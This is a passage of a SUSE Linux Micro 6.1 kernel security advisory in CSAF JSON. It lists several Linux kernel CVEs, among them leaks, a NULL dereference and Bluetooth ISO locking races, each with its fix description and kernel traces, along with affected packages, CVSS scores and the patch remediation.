__x64_sys_mount+0xc4/0x160\n[\u003c0000000027d2140c\u003e] do_syscall_64+0x3f/0x90\n================================================================\n\nTo solve this problem, we add a \"failed_mount10\" tag, and call\next4_quota_off_umount() in this tag to release the enabled qoutas.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54153",
"url": "https://www.suse.com/security/cve/CVE-2023-54153"
},
{
"category": "external",
"summary": "SUSE Bug 1256081 for CVE-2023-54153",
"url": "https://bugzilla.suse.com/1256081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54153"
},
{
"cve": "CVE-2023-54154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: core: Fix target_cmd_counter leak\n\nThe target_cmd_counter struct allocated via target_alloc_cmd_counter() is\nnever freed, resulting in leaks across various transport types, e.g.:\n\n unreferenced object 0xffff88801f920120 (size 96):\n comm \"sh\", pid 102, jiffies 4294892535 (age 713.412s)\n hex dump (first 32 bytes):\n 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 38 01 92 1f 80 88 ff ff ........8.......\n backtrace:\n [\u003c00000000e58a6252\u003e] kmalloc_trace+0x11/0x20\n [\u003c0000000043af4b2f\u003e] target_alloc_cmd_counter+0x17/0x90 [target_core_mod]\n [\u003c000000007da2dfa7\u003e] target_setup_session+0x2d/0x140 [target_core_mod]\n [\u003c0000000068feef86\u003e] tcm_loop_tpg_nexus_store+0x19b/0x350 [tcm_loop]\n [\u003c000000006a80e021\u003e] configfs_write_iter+0xb1/0x120\n [\u003c00000000e9f4d860\u003e] vfs_write+0x2e4/0x3c0\n [\u003c000000008143433b\u003e] ksys_write+0x80/0xb0\n [\u003c00000000a7df29b2\u003e] do_syscall_64+0x42/0x90\n [\u003c0000000053f45fb8\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFree the structure alongside the corresponding iscsit_conn / se_sess\nparent.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54154",
"url": "https://www.suse.com/security/cve/CVE-2023-54154"
},
{
"category": "external",
"summary": "SUSE Bug 1256082 for CVE-2023-54154",
"url": "https://bugzilla.suse.com/1256082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54154"
},
{
"cve": "CVE-2023-54155",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54155"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: core: remove unnecessary frame_sz check in bpf_xdp_adjust_tail()\n\nSyzkaller reported the following issue:\n=======================================\nToo BIG xdp-\u003eframe_sz = 131072\nWARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121\n ____bpf_xdp_adjust_tail net/core/filter.c:4121 [inline]\nWARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121\n bpf_xdp_adjust_tail+0x466/0xa10 net/core/filter.c:4103\n...\nCall Trace:\n \u003cTASK\u003e\n bpf_prog_4add87e5301a4105+0x1a/0x1c\n __bpf_prog_run include/linux/filter.h:600 [inline]\n bpf_prog_run_xdp include/linux/filter.h:775 [inline]\n bpf_prog_run_generic_xdp+0x57e/0x11e0 net/core/dev.c:4721\n netif_receive_generic_xdp net/core/dev.c:4807 [inline]\n do_xdp_generic+0x35c/0x770 net/core/dev.c:4866\n tun_get_user+0x2340/0x3ca0 drivers/net/tun.c:1919\n tun_chr_write_iter+0xe8/0x210 drivers/net/tun.c:2043\n call_write_iter include/linux/fs.h:1871 [inline]\n new_sync_write fs/read_write.c:491 [inline]\n vfs_write+0x650/0xe40 fs/read_write.c:584\n ksys_write+0x12f/0x250 fs/read_write.c:637\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nxdp-\u003eframe_sz \u003e PAGE_SIZE check was introduced in commit c8741e2bfe87\n(\"xdp: Allow bpf_xdp_adjust_tail() to grow packet size\"). But Jesper\nDangaard Brouer \u003cjbrouer@redhat.com\u003e noted that after introducing the\nxdp_init_buff() which all XDP driver use - it\u0027s safe to remove this\ncheck. The original intend was to catch cases where XDP drivers have\nnot been updated to use xdp.frame_sz, but that is not longer a concern\n(since xdp_init_buff).\n\nRunning the initial syzkaller repro it was discovered that the\ncontiguous physical memory allocation is used for both xdp paths in\ntun_get_user(), e.g. tun_build_skb() and tun_alloc_skb(). It was also\nstated by Jesper Dangaard Brouer \u003cjbrouer@redhat.com\u003e that XDP can\nwork on higher order pages, as long as this is contiguous physical\nmemory (e.g. a page).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54155",
"url": "https://www.suse.com/security/cve/CVE-2023-54155"
},
{
"category": "external",
"summary": "SUSE Bug 1256083 for CVE-2023-54155",
"url": "https://bugzilla.suse.com/1256083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54155"
},
{
"cve": "CVE-2023-54156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsfc: fix crash when reading stats while NIC is resetting\n\nefx_net_stats() (.ndo_get_stats64) can be called during an ethtool\n selftest, during which time nic_data-\u003emc_stats is NULL as the NIC has\n been fini\u0027d. In this case do not attempt to fetch the latest stats\n from the hardware, else we will crash on a NULL dereference:\n BUG: kernel NULL pointer dereference, address: 0000000000000038\n RIP efx_nic_update_stats\n abridged calltrace:\n efx_ef10_update_stats_pf\n efx_net_stats\n dev_get_stats\n dev_seq_printf_stats\nSkipping the read is safe, we will simply give out stale stats.\nTo ensure that the free in efx_ef10_fini_nic() does not race against\n efx_ef10_update_stats_pf(), which could cause a TOCTTOU bug, take the\n efx-\u003estats_lock in fini_nic (it is already held across update_stats).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54156",
"url": "https://www.suse.com/security/cve/CVE-2023-54156"
},
{
"category": "external",
"summary": "SUSE Bug 1255704 for CVE-2023-54156",
"url": "https://bugzilla.suse.com/1255704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54156"
},
{
"cve": "CVE-2023-54164",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54164"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: ISO: fix iso_conn related locking and validity issues\n\nsk-\u003esk_state indicates whether iso_pi(sk)-\u003econn is valid. Operations\nthat check/update sk_state and access conn should hold lock_sock,\notherwise they can race.\n\nThe order of taking locks is hci_dev_lock \u003e lock_sock \u003e iso_conn_lock,\nwhich is how it is in connect/disconnect_cfm -\u003e iso_conn_del -\u003e\niso_chan_del.\n\nFix locking in iso_connect_cis/bis and sendmsg/recvmsg to take lock_sock\naround updating sk_state and conn.\n\niso_conn_del must not occur during iso_connect_cis/bis, as it frees the\niso_conn. Hold hdev-\u003elock longer to prevent that.\n\nThis should not reintroduce the issue fixed in commit 241f51931c35\n(\"Bluetooth: ISO: Avoid circular locking dependency\"), since the we\nacquire locks in order. We retain the fix in iso_sock_connect to release\nlock_sock before iso_connect_* acquires hdev-\u003elock.\n\nSimilarly for commit 6a5ad251b7cd (\"Bluetooth: ISO: Fix possible\ncircular locking dependency\"). We retain the fix in iso_conn_ready to\nnot acquire iso_conn_lock before lock_sock.\n\niso_conn_add shall return iso_conn with valid hcon. Make it so also when\nreusing an old CIS connection waiting for disconnect timeout (see\n__iso_sock_close where conn-\u003ehcon is set to NULL).\n\nTrace with iso_conn_del after iso_chan_add in iso_connect_cis:\n===============================================================\niso_sock_create:771: sock 00000000be9b69b7\niso_sock_init:693: sk 000000004dff667e\niso_sock_bind:827: sk 000000004dff667e 70:1a:b8:98:ff:a2 type 1\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_setsockopt:1289: sk 000000004dff667e\niso_sock_connect:875: sk 000000004dff667e\niso_connect_cis:353: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\nhci_get_route:1199: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\nhci_conn_add:1005: hci0 dst 28:3d:c2:4a:7e:da\niso_conn_add:140: hcon 000000007b65d182 conn 00000000daf8625e\n__iso_chan_add:214: conn 00000000daf8625e\niso_connect_cfm:1700: hcon 000000007b65d182 bdaddr 28:3d:c2:4a:7e:da status 12\niso_conn_del:187: hcon 000000007b65d182 conn 00000000daf8625e, err 16\niso_sock_clear_timer:117: sock 000000004dff667e state 3\n \u003cNote: sk_state is BT_BOUND (3), so iso_connect_cis is still\n running at this point\u003e\niso_chan_del:153: sk 000000004dff667e, conn 00000000daf8625e, err 16\nhci_conn_del:1151: hci0 hcon 000000007b65d182 handle 65535\nhci_conn_unlink:1102: hci0: hcon 000000007b65d182\nhci_chan_list_flush:2780: hcon 000000007b65d182\niso_sock_getsockopt:1376: sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getsockopt:1376: sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e\niso_sock_shutdown:1434: sock 00000000be9b69b7, sk 000000004dff667e, how 1\n__iso_sock_close:632: sk 000000004dff667e state 5 socket 00000000be9b69b7\n \u003cNote: sk_state is BT_CONNECT (5), even though iso_chan_del sets\n BT_CLOSED (6). Only iso_connect_cis sets it to BT_CONNECT, so it\n must be that iso_chan_del occurred between iso_chan_add and end of\n iso_connect_cis.\u003e\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPGD 8000000006467067 P4D 8000000006467067 PUD 3f5f067 PMD 0\nOops: 0000 [#1] PREEMPT SMP PTI\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014\nRIP: 0010:__iso_sock_close (net/bluetooth/iso.c:664) bluetooth\n===============================================================\n\nTrace with iso_conn_del before iso_chan_add in iso_connect_cis:\n===============================================================\niso_connect_cis:356: 70:1a:b8:98:ff:a2 -\u003e 28:3d:c2:4a:7e:da\n...\niso_conn_add:140: hcon 0000000093bc551f conn 00000000768ae504\nhci_dev_put:1487: hci0 orig refcnt 21\nhci_event_packet:7607: hci0: e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
